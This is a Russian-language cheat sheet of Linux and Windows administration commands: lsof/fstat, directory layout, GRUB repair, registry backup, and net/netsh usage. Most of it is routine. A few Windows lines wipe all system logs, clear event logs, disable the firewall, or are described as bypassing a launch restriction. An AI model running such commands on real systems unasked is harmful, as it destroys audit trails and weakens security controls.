# fstat -f /home # для точки монтирования
# fstat -p PID # для приложения с PID
# fstat -u user # для имени пользователя
Найти открытый файл для Xorg:
# ps ax | grep Xorg | awk '{print $1}'
1252
# fstat -p 1252
USER CMD PID FD MOUNT INUM MODE SZ|DV R/W
root Xorg 1252 root / 2 drwxr-xr-x 512 r


root Xorg 1252 text /usr 216016 -rws--x--x 1679848 r
root Xorg 1252 0 /var 212042 -rw-r--r-- 56987 w
Найти файл с inum 212042 в директории /var можно так:
# find -x /var -inum 212042
/var/log/Xorg.0.log

________________________________________________________________

Как найти открытый файл в директории с помощью fuser или lsof
# fuser -m /home # Список процессов имеющих доступ к /home
# lsof /home
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
tcsh 29029 eedcoba cwd DIR 0,18 12288 1048587 /home/eedcoba (guam:/home)
lsof 29140 eedcoba cwd DIR 0,18 12288 1048587 /home/eedcoba (guam:/home)
Найти по PID приложения:
ps ax | grep Xorg | awk '{print $1}'
3324

# lsof -p 3324
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
Xorg 3324 root 0w REG 8,6 56296 12492 /var/log/Xorg.0.log
По имени файла:
# lsof /var/log/Xorg.0.log
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
Xorg 3324 root 0w REG 8,6 56296 12492 /var/log/Xorg.0.log

________________________________________________________________
Как редактировать список автозагрузки сервисов?
Для поклонников основанных на RedHat и Fedora дистрибутивов есть замечательная программа sysv-rc-conf. Установим ее:
root@linux# aptitude install sysv-rc-conf
Однако можно сделать тоже самое и вручную. Для этого достаточно сделать нужный файл исполняемым или наоборот, если нужно отключить автозагрузку сервиса, снять бит исполняемости:

root@linux# chmod +x /etc/init.d/foo
root@linux# chmod -x /etc/init.d/bar
Остальные могут воспользоваться "изкоробочной" утилитой update-rc.d

Не забывайте, что по умолчанию Debian использует второй уровень автозагрузки (man init, man inittab).
________________________________________________________________
Каталоги Linux

/bin - в этом каталоге размещаются утилиты (исполняемые файлы) для работы на уровне системы.
Из примеров можно привести ls, date, cp, pwd и т.д.

/sbin - в этом каталоге размещены системные утилиты и программы,
которые предназначены для управления самой системой. Пример: shutdown, init, ifconfig.

/boot - в этом каталоге размещены файлы запуска системы: ядро, файлы GRUB, initrd, а также файл конфигурации ядра.
initrd - это образ RAM-диска который используется для того, чтобы смонтировать временную
файловую систему на время загрузки ядра. По сути initrd содержит необходимые модули которые позволят
смонтировать реальную файловую систему и продолжить инициализацию и загрузку системы.

/boot/grub/ - каталог содержит загрузчик GRUB и его конфигурационные файлы.

/etc - в этом каталоге находится большинство конфигурационных файлов системы.
Содержим много подкаталогов каждый их которых отвечает за определенную область.
рассмотрим некоторые из них. /alsa - расширенная поддержка звуковых устройств, /sane.d - поддержка сканера,
/X11 - файлы графической подсистемы, /init.d - скрипты, которые управляют службами, /rc0.d - /rc6.d -
содержат скрипты, которые должны выполнятся на соответствующем уровне (runlevel), /cron.d- файлы службы
периодического запуска процессов, /cups - файлы службы печати, /samba - конфигурационные файлы одноименной системы,
/udev - файлы одноименной подсистемы.

/home - в этом каталоге размещаются домашние каталоги пользователей зарегистрированных в системе.
Как правило названия домашних каталогов совпадает с логином пользователя.

/root - каталог пользователя root.

/selinux - каталог одноименной подсистемы, которая появилась не так давно и позволяет
более жестко контролировать права пользователей (в том числе и рута) для большей безопасности.

/lib - в этом каталоге хранятся библиотеки операционной системы и приложений.

/lib/modules/ - каталог содержащий модули ядра. В этом каталоге расположены подкаталоги,
которые совпадают с версиями ядра, которые были установлены в системе. То есть для каждой версии
ядра есть свой набор модулей. Это очень важно и нужно обратить на это внимание. Часто при компиляции
ядра забывают изменять версию, новое ядро при загрузке использует модули предыдущей версии и система
не загружается. Текущую версию ядра можно узнать по команде uname -r, возвращаемая версия обязательно
совпадет с названием одного из каталогов в /lib/modules/ .

/lib/modules/версия ядра/kernel/drivers/ - модули, которые поддерживают отдельные устройства
(видеоадаптеры, сетевые карты, звуковые карты и т.д.). Например, в /lib/modules/2.6.28-15-generic/kernel/drivers/net/
 находятся модули поддержки различных сетевых карт.

/lib/modules/2.6.28-15-generic/kernel/fs/ - модули поддержки различных файловых систем.

/lib/modules/2.6.28-15-generic/kernel/net/ - модули поддержки различных типов сетей (Apple Talk, X25, IPX и другие).

/mnt - каталог предназначен для монтирования в нем блочных устройств, которые не являются частью
cистемы Linux. Например, Windows-раздел жесткого диска не является частью Linux и монтируется в именно в этот каталог.
Также несколько лет назад в эту директорию монтировались и CDROM и Floppy-диски.
Сейчас могут монтироваться либо в /media либо непосредственно в корень. Зависит от дистрибутива.

/media - предназначен для монтирования блочных устройств которые подключаются физически к системе в процессе ее работы.
 Самые распространенные из устройств это флешки, внешние накопители. Монтируются устройства в этот каталог как правило автоматически подсистемой udev.

/usr - в этом каталоге сохраняются все приложения (не путать с утилитами). Файлы Linux-приложений в
отличии отWindows-приложений хранятся в соответствующих папках в зависимости от типа. Поэтому в каталоге
 /usr есть такие подкаталоги как /etc - для файлов конфигураций, /bin - для исполняемых файлов, /lib -
библиотеки приложений и другие. То есть получается, что /usr - это как бы корень для приложений. Также
хочу отметить, что во многих дистрибутивах конфигурационные файлы приложений могут располагаться не в
/lib/etc/, а в /etc, и каталога /lib/etc/ может не быть. В каталоге /usr также располагаются различные
службы такие как apache, bind и другие, которые не имеют непосредственного отношения к Linux. Для приложений,
которым в силу определенных причин необходимо хранить все свои файлы в одном каталоге (например это различные
кроссплтаформенные приложения) придумали директорию /opt. Например, там могут быть такие
приложения как OpenOffice, Picasa, Chrome.

/tmp - Каталог для хранения временных файлов, которые необходимы во время работы программ.
В этой директории временные файлы существуют пока работает приложение, которое их создало.
Как только приложения прекращает работу временные файлы удаляются. Временные файлы могут содержать
различную информацию и некоторые из них могут располагаться в каталоге /home/имя пользователя/tmp/.

/var - в этом каталоге хранятся различные системные файлы такие как, например, журналы
различных подсистем или буферные каталоги принтеров, электронной почты и т.д. Для системного
 администратора особое внимание на каталог/var/log/ где как раз и содержаться файлы-журналы.
Так как эти файлы постоянно растут, то необходимо внимательно следить за свободным местом на
жестком диске где размещен каталок /var. Рассмотрим назначение еще нескольких подкаталогов находящихся
в /var. /var/lock/ - здесь храняться файлы котороые сигнализируют о блокировке того или иного ресурса
системы. /var/run/ - в этом каталоге запущенные службы создают подкаталоги в которых содержится файл и
идентификатором процесса службы. Например, в файле /var/run/cron.pid содержится идентификатор процесса
службыcron. Команды cat /var/run/cron.pid и ps ax | grep cron покажут, что числа совпадают. /var/mail/ -
файлы почтовых ящиков пользователей. /var/spool/ - в этом каталоге сохраняются очереди различных программ
или служб. Например,/var/spool/cups/ - содержит очереди заданий для принтеров.
________________________________________________________________
Восстановление grub
# mount /dev/sda6 /mnt               # монтировать Linux partion на /mnt
# mount --bind /proc /mnt/proc       # монтировать подсистему proc в /mnt
# mount --bind /dev /mnt/dev         # монтировать устройства в /mnt
# chroot /mnt                        # сменить корневую директрорию на Linux partition
# grub-install /dev/sda              # переустановить grub со старыми опциями
________________________________________________________________

для рута отключим возможность логина по SSH в /etc/ssh/sshd_config:
sudo nano /etc/ssh/sshd_config
PermitRootLogin yes → PermitRootLogin no
________________________________________________________________

atop
Atop имеет два режима работы — сбор статистики и наблюдение за системой в реальном времени.
В режиме сбора статистики atop запускается как демон и раз в N времени (обычно 10 мин)
скидывает состояние в двоичный журнал. Потом по этому журналу atop'ом же (ключ -r и имя лог-файла)
можно бегать вперёд-назад кнопками T и t, наблюдая показания atop'а с усреднением за 10 минут в любой интересный момент времени.
В отличие от top отлично знает про существование блочных устройств и сетевых интерфейса,
способен показывать их загрузку в процентах (на 10G, правда, процентов не получается, но хотя бы показывается количество мегабит).
Незаменимое средство для поиска источников лагов на сервере, так как сохраняет не только статистику загрузки системы,
но и показатели каждого процесса — то есть «полистав» до нужного момента времени можно увидеть, кто этот
счастливый момент с LA > 30 создал. И что именно было причиной — IO программ, своп (нехватка памяти),
процессор или что-то ещё. Помимо большего количества информации ещё способен двумя цветами подсказывать,
какие параметры выходят за разумные пределы.

htop
В отличие от atop, htop не собирает статистику и просто показывает текущее состояние.

iotop
Специализированная утилита для анализа потребления дисковой полосы.

iftop
Специализированная утилита, позволяющая наблюдать за трафиком в реальном времени.
Требует очень рутовых прав и pcap, т.к. работает почти аналогичо tcpdump'у. Показывает загруженность интерфейса.

sntop
Замечательная штука для скринсейвера или публичного монитора — по конфигу рассылает
пинги и показывает, если какой-то хост лёг.

xrestop
Монитор потребления ресурсов X-сервера разными приложениями, которые к нему подключились.

iptstate
Монитор contrack из iptables, показывает активные трансляции с возможностью их прибить.

________________________________________________________________
Демоны
init                    -Unix программа, которая порождает все остальные процессы.
biod                    -Работает совместно с удаленным nfsd для разрешения клиентских запросов NFS.
crond                    -Планировщик задач, работающий в фоновом режиме.
dhcpd                    -Динамически определяет конфигурацию TCP/IP для клиентов.
fingerd            -Обеспечивает сетевой интерфейс для протокола finger, для использования команды finger.
ftpd                    -Служба FTP-запросов с удалённой системы. Прослушивает специальный порт, определённый в служебном файле для FTP.
httpd                    -Демон веб-сервера.
inetd                    -Прослеживает сетевые запросы. При допустимом запросе запускает фоновый процесс для обслуживания запроса.
xinetd                 -В некоторых системах используется расширенная версия
lpd                    -«Line Printer Daemon» (англ.) протокол управления пулом печати.
nfsd                    -Процесс NFS операторских запросов для клиентских систем. Исторически каждый nfsd демон поддерживает один запрос за раз, поэтому запускается несколько копий.
ntpd                    -NTP демон, который управляет синхронизацией времени по сети. xntpd снабжён 3-й версией стандарта NTP.
rpcbind            -Обеспечивает преобразование remote procedure call (RPC), такой как ypbind.
sendmail               -SMTP демон.
sshd                    -Прослушивает запросы secure shell от клиентов.
swapper            -Копирует местный процесс в пространство swap для исправления физической страницы памяти для ядра. Также называется sched.
syslogd            -Системный процесс записи различных системных сообщений.
syncd                    -Периодически синхронизирует установленные системные файлы с системной памятью.
xfsd                    -Обслуживает X11 шрифты для удалённых клиентов.
vhand                    -Освобождает страницы памяти для использования другими процессами. Также известен как «page stealing daemon»англ.
ypbind                    -Находит сервер для NIS домена и запоминает информацию в файле.
jackd                    -Аудио сервер
smbd, nmbd, winbindd   -Серверы, предоставляющие доступ к файлам и принтерам для клиентских компьютеров с Windows по родному для тех протоколу.
                        Близки к службе "Сервер" в Windows (в W'XP да, для остальных хорошо бы уточнить, т.к. для 16-битных Windows такой службы
                        точно не было; да и в W95/98/ME, скорее всего, тоже).
cupsd                    -Сервер работы с печатью. Как доступ к удаленным принтерам, доступ к локальным, доступ извне к локальным.
mysqld                    -Демон базы данных MySQL
dbus-daemon            -Демон для работы с шиной данных
________________________________________________________________

windows tools

_________________________________________________________________________________________
_________________________________________________________________________________________

Выполнить RUN
_________________________________________________________________________________________

sysdm.cpl - Быстродействие,Визуальные эффекты
mmsys.cpl - Звуковая схема
msconfig - встроенный редактор автозагрузки
regedit  - встроенный редактор реестра
appwiz.cpl - Установка и удаление программ
certmgr.msc - Сертификаты
ciаdv.msc - Служба индексирования
cliconfg - Программа сетевого клиента SQL
clipbrd - Буфер обмена
compmgmt.msc - Управление компьютером
dcomcnfg - Консоль управления DCOM компонентами
ddeshare - Общие ресурсы DDE (на Win7 не работает)
desk.cpl - Свойства экрана
devmgmt.msc — Диспетчер устройств
dfrg.msc - Дефрагментация дисков
diskmgmt.msc - Управление дисками
drwtsn32 - Dr.Watson
dxdiag - Служба диагностики DirectX
eudcedit - Редактор личных символов
eventvwr.msc - Просмотр событий
firewall.cpl - настройки файерволла Windows
gpedit.msc - Груповая политика
iexpress - IExpress (не знаю что это :) )
fsmgmt.msc - Общие папки
fsquirt - Мастер передачи файлов Bluetooth
chkdsk - Проверка дисков (обычно запускается с параметрами буква_диска: /f /x /r)
control printers - Принтеры и факсы
control printer  - настройка принтера
printui /s /t2 - для управления принтером
printmanagement.msc - для управления принтером
control admintools - Администрирование компьютера - запускается не всегда
control schedtasks - Назначенные задания (планировщик)
control userpasswords - Управление учётными записями
control userpasswords2 - Управление учётными записями
control keymgr.dll - сохраненные пароли
control date/time настройка времени
control network настройка сети
control desk  настройка разрешения экрана
control mouse настройка клавиатуры
control keyboard настройка клавиатуры
control  fonts настройка шрифтов
compmgmt.msc - Управление компьютером (compmgmt.msc /computer=pc - удаленное управление компьютером pc)
lusrmgr.msc - Локальные пользователи и группы
mmc— создание своей оснастки
mrt.exe - Удаление вредоносных программ
msconfig - Настройка системы (автозапуск, службы и др...)
mstsc - Подключение к удаленному рабочему столу
ncpa.cpl - Сетевые подключения
ntmsmgr.msc - Съёмные ЗУ
ntmsoprq.msc - Запросы операторов съёмных ОЗУ (для XP)
odbccp32.cpl - Администратор источников данных
perfmon.msc - Производительность
regedit - Редактор реестра
rsop.msc - Результатирующая политика
secpol.msc - Локальные параметры безопасности (Локальная политика безопасности)
services.msc - Службы
sigverif - Проверка подписи файла
sndvol — управление громкостью
sysdm.cpl - Свойства системы
sysedit - Редактор системных файлов (не знаю, что это :) )
syskey - Защита БД учётных записей
taskmgr - Диспетчер задач
utilman - Диспетчер служебных программ
verifier - Диспетчер проверки драйверов
wmimgmt.msc - Инфраструктура управления WMI
sdcld.exe - Резервное копирование
rstrui  - Восстановление системы systemrestore

________________________________________________________________________________________
________________________________________________________________________________________

Реестр   Regedit
________________________________________________________________________________________

reg add — Добавить параметр в реестр
reg compare — Сравнивать части реестра.
reg copy — Копирует из одного раздела в другой
reg delete — Удаляет указанный параметр или раздел
reg export — Экспортировать часть реестра
reg import — Соответственно импортировать часть реестра
reg load — Загружает выбранную часть реестра
reg query — Выводит значения заданной ветки реестра
reg restore — Восстанавливает выбранную часть реестра из файла
reg save — Сохраняет выбранную часть реестра
reg unload — Выгружает выбранную часть реестра
__________________________________________________________________________________________
Где лежат файлы реестра
В Windows 7, согласно сведениям из HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist файлы реестра хранятся в следующих местах:
01= Ветка реестра «HKEY_LOCAL_MACHINE\HARDWARE» формируется в зависимости от оборудования (динамически);
02= Ветка реестра «HKEY_LOCAL_MACHINE\BCD00000000» формируется из файла «%SystemRoot%\Boot\BCD»
03= Ветка реестра «HKEY_LOCAL_MACHINE\SYSTEM» формируется из файла «%SystemRoot%\System32\config\SYSTEM»
04= Ветка реестра «HKEY_LOCAL_MACHINE\SOFTWARE» формируется из файла «%SystemRoot%\System32\config\SOFTWARE»
05= Ветка реестра «HKEY_LOCAL_MACHINE\SECURITY» формируется из файла «%SystemRoot%\System32\config\SECURITY»
06= Ветка реестра «HKEY_LOCAL_MACHINE\SAM» формируется из файла «%SystemRoot%\System32\config\SAM»
07= Ветка реестра «HKEY_USERS\.DEFAULT» формируется из файла «%SystemRoot%\System32\config\DEFAULT»
08= Ветка реестра «HKEY_USERS\S-1-5-18» формируется из файла «%SystemRoot%\System32\config\systemprofile\NTUSER.DAT» (относится к учетной записи system)[1]
09= Ветка реестра «HKEY_USERS\S-1-5-19» формируется из файла «%SystemRoot%\ServiceProfiles\LocalService\NTUSER.DAT» (относится к учетной записи LocalService)
10= Ветка реестра «HKEY_USERS\S-1-5-20» формируется из файла «%SystemRoot%\ServiceProfiles\NetworkService\NTUSER.DAT» (относится к учетной записи NetworkService)
11= Ветка реестра «HKEY_USERS\SID_пользователя\» формируется из файла «%USERPROFILE%\NTUSER.DAT»
12= Ветка реестра «HKEY_USERS\SID_пользователя\_Classes» формируется из файла «%USERPROFILE%\AppData\Local\Microsoft\Windows\UsrClass.dat»
Резервные копии файлов реестра DEFAULT, SAM, SECURITY, SOFTWARE и SYSTEM находятся в папке «%SystemRoot%\System32\config\RegBack».
Само резервное копирование производится силами Планировщика задач в 0 ч. 00 мин. каждые 10 дней по заданию «RegIdleBackup»,
расположенному в иерархии задач по пути «\Microsoft\Windows\Registry».
____________________________________________________________________________________________

в Windows7 каталог repair тут -> C:\Windows\System32\config\RegBack дефолтный бэкап реестра
backup.bat бэкапим
if exist  c:\backup\SOFTWARE.OLD del c:\backup\SOFTWARE.OLD
if exist c:\backup\NTUSER.DAT.OLD del c:\backup\NTUSER.DAT.OLD
rem c:\backup\SOFTWARE c:\backup\SOFTWARE.OLD
rem c:\backup\NTUSER.DAT c:\backup\NTUSER.DAT.OLD
REG SAVE HKLM\SOFTWARE c:\backup\SOFTWARE
REG SAVE HKCU c:\backup\NTUSER.DAT

восстановление
REG RESTORE HKLM\SOFTWARE c:\backup\SOFTWARE
REG RESTORE  что   откуда

для бэкапа реестра делаем следующие
открываем regedit и экспортируем следующие ветки
HKEY_CURRENT_USER экспортируем целиком
HKEY_LOCAL_MACHINE\HARDWARE  экспортируем отдельным файлом
HKEY_LOCAL_MACHINE\SAM экспортируем отдельным файлом
HKEY_LOCAL_MACHINE\SOFTWARE экспортируем отдельным файлом
HKEY_LOCAL_MACHINE\SYSTEM экспортируем отдельным файлом
HKEY_LOCAL_MACHINE\SECURITY экспортируем отдельным файлом

____________________________________________________________________________________________

Следующая команда, запущенная от имени Администратора, заменит язык на русский для MSE
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Security Client" /v market /t REG_SZ /d ru-ru /f

Тоже самое через файл реестра *.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Security Client]
"Market"="ru-ru"

_________________________________________________________________________________________

Где расположен файл hosts
файла hosts в %SystemRoot%\System32\Drivers\Etc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters
Параметр DataBasePath содержит путь к стандартным файлам баз данных (hosts, lmhosts, networks, protocols)

_________________________________________________________________________________________

Изменение MAC-адреса в редакторе реестра
В редакторе реестра откройте раздел HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
Параметры сетевых карт в редакторе реестра
В этом разделе будет содержаться несколько «папок», каждая из которых соответствует
отдельному сетевому устройству. Найдите то из них, MAC-адрес которого нужно изменить.
Для этого обращайте внимание на параметр DriverDesc в правой части редактора реестра.

_________________________________________________________________________________________
_________________________________________________________________________________________

Консоль CMD
_________________________________________________________________________________________

chcp 1251 - смена кодировки  (1251win,866dos)

Управление система
net statistics server - Как посмотреть uptime в Windows
net config workstation - показывает информацию по пк
whoami - показывает пользователей
whoami /all - показывает всех пользователей и группы
qwinsta - показывает кто работает удаленно
ver - показывает версию ядра
set - показывает переменные окружения
systeminfo - показывает информацию о системе
SystemInfo /s machine - покажет много полезного об удаленной машине
qprocess * - показывает информацию о процесса
qappsrv  - показывает терминальный сервер
schtasks /query /fo csv /v > readmy.txt
at - показывает задания
schtasks - показывает все задания
net start или sc query - показывают все процессы
sc getkeyname "ХХХХХ" - получишь ид сервиса
sc queryex "ХХХХХ" - узнаешь по ид все о сервисе
fsutil fsinfo drives - показывает все текущие диски в системе
gpresult /z - показывает все групповые политики
shutdown /t 00 /s - выключить
shutdown -r -t 00 -f - ребут
shutdown - выключение компьютера , можно удаленно выключить другой.
shutdown /r /o /t 0 - загрузка в безопасный режим
gpupdate - применяет все новые и измененные политики.
gpupdate /force - применяет все политики: новые и старые.
powercfg  /h off - отключить гибернацию
tasklist - список процессов
tasklist /fi ″username eq user″ /fi ″memusage le 40000″
tasklist /s
tasklist | findstr process ID
tasklist /SVC - Отображение служб для процессов
tasklist /P - Отображение процессов с подгруженными dll’ками
Type tasklist /svc что же скрывает Svchost.exe
taskkill /pid 1230 /pid 1241 /pid 1253
taskkill /f /im notepad.exe - убить процессы по имени notepad.exe
taskkill /s srvmain /u maindom\hiropln /p p@ssW23 /fi "IMAGENAME eq note*" /im *
taskkill /s pc /u domain\user /p pass /fi name filtr /pid process /im name process /f /t time
taskkill /im explorer
wbadmin stop job - остановка архивации
wevtutil el - список всех логов LOG
wevtutil qe LogName - получение конкретного лога
wevtutil cl LogName - удаляем указанный лог
del %windir%\*.log /a /s /q /f - брутальный способ удаления логов
netdom renamecomputer %computername% /newname:{newComputerName} - смена имени компьютера (работает на win2008)
netdom join {computerName} /domain:{domainName} /userD:{domainUsername} /passwordD:{domainPassword} - подключение пк к домену
slmgr –ipk {licenseKey} - ввести ключ лицензии с помощью этой команды
slmgr –ato - Активация  лицензии
ocsetup {componentName} - используется для установки нужного компонента
ocsetup Microsoft-Hyper-V - установки роли Hyper-V
wusa {patchFileName} - Для установки исправлений MSU и MSP вручную
cleanmgr - очистка системы от временных файлов
_________________________________________________________________________________________

Файлы
CHKDSK /F /R -исправление ошибок на диске
sfc /scannow -исправление ошибок системных фалов
defrag C: /B /U -выполнить дефрагментацию диска c
defrag /A /C -проверить фрагментацию на всех дисках
type %WINDIR%\System32\drivers\etc\hosts - показывает содержимое файла hosts
dir - показать содержимое директории
dir > xxx.txt - запишет в файл xxx.txt
cd - совершит переход cd . cd .. cd c:\windows cd d:
icacls папка_или_файл /grant:r пользователь:разрешение -выставить разрешения на файл чтения запись и тд для пользователя или группы
icacls %userprofile%\appdata\local\temp\* /grant:r Все:F - Разрешения пользователю ВСЕ полные права на каталог %userprofile%\appdata\local\temp\
del c:\1.txt - удалить файл 1.txt
del c:\test\*.* - очистит папку test по шаблону *.*
rmdir /s имя_папки - удалить папку со всем содержимым
call prog_name - запуск программы
edit - редактор текста (в windows 7 уже нету его)
xcopy что [куда] - копирование имеет много параметров
copy что [куда] - копирование
type  - показывает содержимое файлов type filename
mklink /J c:\линк d:\куда\линк  - Создание линков
mklink /J "С:\folder" "D:\folder" - Создание линков
runas /user:Username1 notepad.exe - Выполнить от пользователя Username1
runas /user:"Дмитрий Петров" "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe"- Выполнить от пользователя Дмитрий Петров
runas /savecred /user:Username1 notepad.exe - Выполнить от пользователя Username1 и сохранить пароль (Ключ /savecred не работает в winHome)
runas /savecred /user:Username "explorer.exe /separate" - Команда позволяла обойти запрет на запуск.Ключ /separate не работает в WINXP+

_________________________________________________________________________________________

Сеть
ipconfig /all
ipconfig /release
ipconfig /renew
ipconfig /flushdns Очистите локальный кэш сопоставителя DNS
ipconfig /displaydns
nbtstat -n информация об соединения
netstat -nabo информация об соединения и о программах которые их используют
netstat -s -р [tcp|udp|icpm|ip]
netstat -r информация о маршрутах
netstat -na | findstr :445
browstat status
mstsc /v:192.168.0.82 /admin - когда кончились лицухи
shadow idsession подключится к пользователю (idsession смотрем на терминале в диспетчере задач)
iperf - аналог lynux проги для проверки соединения
route add -p 10.11.0.0(net) mask 255.255.255.0 10.254.0.190(gw)
route -p add 172.16.254.0 mask 255.255.255.0 10.254.0.190
route print информация о маршрутах
telnet host
dcdiag /q
tracert ip трассировки сетевого маршрута
ping -t ip/dns проверка живучести хоста
pathping -n ip/dns трассировки сетевого маршрута. сочетает в себе функциональность утилит ping и tracert
route print показать маршруты
arp -a - таблица мак адресов
netsh interface ip delete arpcache - очистка Arp cache (MAC)
arp -d <ip address> - очистка Arp cache (MAC)
arp -s <ip address> <mac address> - добавить статическую запись в arp-таблицу
netsh /?
netsh winsock reset - Сброс параметров протокола Интернета (TCP/IP)
netsh int ip reset C:\ iplog.txt - Сброс настроек
Netsh IP Reset - Сброс настроек
netsh int ipv4 install - Установка TCP/IP протокола
netsh int ipv4 uninstall - Деинсталляция TCP/IP протокола
netsh diag gui  - Получаю отчет, выполненный в виде прекрасной иерархической схемы, где детально представлен каждый адаптер системы.
netsh firewall set logging droppedpackets=enable - Для логирования дропнутых пакетов
netsh firewall set logging connections=enable - Для логирования соединений
netsh firewall show logging - Для получения конфигурации фаервола
netsh firewall set opmode disable - Выключить фаервол
netsh firewall set opmode enable - Включить фаервол
netsh advfirewall set allprofiles state off  - Отключение фаервола Windows firewall из командной строки
netsh advfirewall set allprofiles state on  - Включение фаервола Windows firewall из командной строки
netsh advfirewall firewall show rule name=all - Запрос правил брандмауэра
netsh advfirewall reset - Сброс брандмауэра
netsh advfirewall set currentprofile logging filename "C:\temp\pfirewall.log" - Настройка журнала фаервола.
netsh advfirewall firewall add rule name="All ICMP V4" dir=in action=block protocol=icmpv4 - отключение ICMP (ping)
netsh advfirewall firewall add rule name="All ICMP V4" dir=in action=allow protocol=icmpv4 - включение ICMP (ping)
netsh advfirewall firewall add rule name="Open SQL Server Port 1433" dir=in action=allow protocol=TCP localport=1433 - открыть порт 1433
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow program="C:\programfiles\messenger\msnmsgr.exe" - разрешить программу
netsh advfirewall firewall set rule group="remote administration" new enable=yes - разрешение удаленного управления (удаленный реестор и тд)
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes - разрешение удаленного управления RDP
netsh advfirewall export "C:\temp\WFconfiguration.wfw" - выгрузить(export) настройки
netsh advfirewall import "C:\temp\WFconfiguration.wfw" - загрузить(import) настройки
netsh wlan connect ssid=‘mySSID’ name=‘WLAN-NAME’ - Подключиться к уже определенной беспроводной сети
netsh wlan show settings - Показать текущие параметры беспроводной сети
netsh wlan export profile name="MyWIFI" folder=C:\1\wlan interface="Wireless Network Connection" - Экспортировать профиль беспроводной сети Wi-Fi
netsh wlan add profile filename="MYWIFI.xml " - Импортировать профиль беспроводной сети Wi-Fi
netsh wlan show profiles - Проверить его наличие профилей Wi-Fi
netsh wlan connect ssid='mySSID' name='MyWIFI' Использовать профиль для  подключения к MyWiFI
netsh wlan dump - Выполнить дамп беспроводных параметров
netsh wlan show autoconfig - Проверить параметры  автоматической настройки Wi-Fi
netsh wlan show autoconfig set autoconfig enabled=no interface='Wireless Network Adaptor' - Изменять свои параметры автоматической настройки Wi-Fi (вкл/выкл)
netsh wlan set blockednetworks display=hide - Скрывать заблокированные сети из списка доступных сетей Wi-Fi
netsh set logging set logging maxfilesize=20480 - Для управления файлом лога
netsh set logging %windir%\pfirewall.log - Для управления файлом лога
netsh interface ip show config - показать ip (почти тоже самое что ipconfig )
netsh dhcp show server - выдаст нам, кто есть у нас сервер DHCP.
netsh dhcp server dump - всю конфигурационную информацию сервера DHCP (так же как описано выше можно записать в файл)
netsh int 6to4 set st disabled - отключить ipv6
netsh int 6to4 show state - состояние службы ipv6
netsh -c interface dump &amp;gt; c:\location1.txt - Экспортировать(Сохранить) сетевые настройки
netsh -f c:\location1.txt - Импортировать Сетевые настройки
netsh interface ipv4 set address {interfaceName} static {ipAddress} {subnetMask} {defaultGateway} - Cмена IP из консоли
netsh interface ip set address name="Local Area Connection" static 192.168.0.100 255.255.255.0 192.168.0.1 1 - Пример смены IP
netsh interface show interface - показать сетевые интерфейсы
netsh interface ipv4 add dnsserver name={interfaceName} address={dnsServerIpAddress} index=1 - установка DNS сервера
netsh interface ip set dns "Local Area Connection" static 192.168.0.200 - Пример установка DNS сервера
netsh interface ip set wins "Local Area Connection" static 192.168.0.200 - Пример установки wins сервера
netsh winhttp set proxy {proxyServerName}:{proxyPortNumber} - Установка прокси
netsh interface ip set address "Local Area Connection" dhcp - Установка получение Ip по DHCP
secedit /configure /cfg %windir%\inf\defltbase.inf /db defltbase.sdb /verbose  - сброс политики безопасности на дефолтовые windows7
nbtstat -a pc — имя пользователя работающего за удаленной машиной pc
netstat -a - список всех подключений к компьютеру
nslookup server 8.8.8.8 set q=ALL  ya.ru 
nslookup server 8.8.8.8 set q=mx ya.ru 
net user username passworduser /add /expires:never /passwordchg:no - создание юзера
net user Администратор /active:yes включение Администратора
net user имя /active:no - заблокировать пользователя
net user имя /active:yes - разблокировать пользователя
net user имя /domain - информация о пользователе домена
net user Имя /add — добавить пользователя
net user имя_пользователя пароль /add
net user Имя /delete — удалить пользователя
net group username grupaforuser -добавление юзера в группу
net localgroup Administrators имя_пользователя /add
net localgroup Users имя_пользователя /delete
net localgroup administrators показывает кто состоит в группе администраторы
net localgroup administrators /domain показывает кто в группе администратор в домене
net accounts /maxpwage:unlimited
net accounts показывает политику паролей
net account /domain показывает политику паролей в домене
net use t: /delete, где t – имя удаляемого диска
net use * /delete - убить все подключиные шары
net use x:\\ip
net use \\ip\ipc$ * /u:user
NET USE x: \\server\cdrom password /USER:domain\username пароль подключить диск с логином и паролем
net use l: \\имя компа\папка\ - подключить сетевым диском l: папку на удаленном компьютере
net start netlogon - net stop netlogon
net view \\ip
net time
net share   - показывает диски с общим доступом
net share admin$ /yes - подключить общие системные папки
net localgroup group user /add — Добавить в группу group, пользователя user
net localgroup group user /delete — Удалить пользователя из группы
net send pc ''текст '' - отправить сообщение пользователю компьютера pc
net sessions — список пользователей
net session /delete - закрывает все сетевые сессии

_________________________________________________________________________________________

Стандартные переменные.
SET - команда покажит все переменные
%AppData%\Microsoft\Internet Explorer\Quick Launch - Панели быстрого запуска
%userprofile%\appdata\local\temp  - католог темп
%AppData%\1C\1CEStart\ibases.v8i - базы 1с8
%SYSTEMDRIVE%  - Возвращает имя диска, содержащего корневой каталог операционной системы
%SYSTEMROOT%, %WINDIR% - Возвращает размещение корневого каталога операционной системы
%PATH% - Указывает путь поиска для исполняемых файлов.
%PROGRAMFILES% - Указывает путь к каталогу установки программ (Program Files)
%COMMONPROGRAMFILES%  - Указывает путь к общему каталогу программ (Program Files\Common Files).
%TEMP% и %TMP%  - Возвращает временные папки
%USERPROFILE% - Возвращает размещение профиля для текущего пользователя.
%ALLUSERSPROFILE% - Возвращает размещение профиля "All Users".
%CD% - Возвращает путь к текущей папке.
%USERNAME%  - Покажет имя пользователя
%ALLUSERSPROFILE%  -  C:\ProgramData
%APPDATA% - C:\Users\NAMEUSER\AppData\Roaming
%CommonProgramFiles% - C:\Program Files\Common Files
%CommonProgramFiles(x86)% - C:\Program Files (x86)\Common Files
%CommonProgramW6432% - C:\Program Files\Common Files
%COMPUTERNAME% - Имя пк
%ComSpec% - C:\Windows\system32\cmd.exe
%HOMEDRIVE%  - C:
%HOMEPATH%  - \Users\USERNAME
